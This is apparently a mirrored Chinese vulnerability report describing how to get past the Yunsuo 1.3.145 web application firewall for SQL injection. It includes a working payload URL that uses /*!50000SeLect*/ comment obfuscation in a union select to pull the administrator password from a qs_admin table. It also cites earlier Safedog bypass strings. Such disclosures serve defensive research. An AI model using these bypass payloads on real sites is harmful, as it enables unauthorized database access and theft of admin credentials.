实战绕过云锁1.3.145进行注入测试二

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 嘿嘿 ### 详细说明: 之前http://www.wooyun.org/bugs/wooyun-2014-089487/trace/ca338e20666fbe79e87f32643c939075 通过id=8.0union select ...和id=8E0union select ...可绕过安全狗进行注入 然后这次是/*!50000SeLect*/这种姿势 ### 漏洞证明: 获取管理员的pwd为例,没有任何提示 http://localhost/74/wap/wap-company-show.php?id=-1%20union+/*!50000SeLect*/1,2,3,pwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin# [<img src="https://images.seebug.org/upload/201412/31124053caec74eb3e7fa14eda80cdf5a4d53228.jpg" alt="yyyy.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31124053caec74eb3e7fa14eda80cdf5a4d53228.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息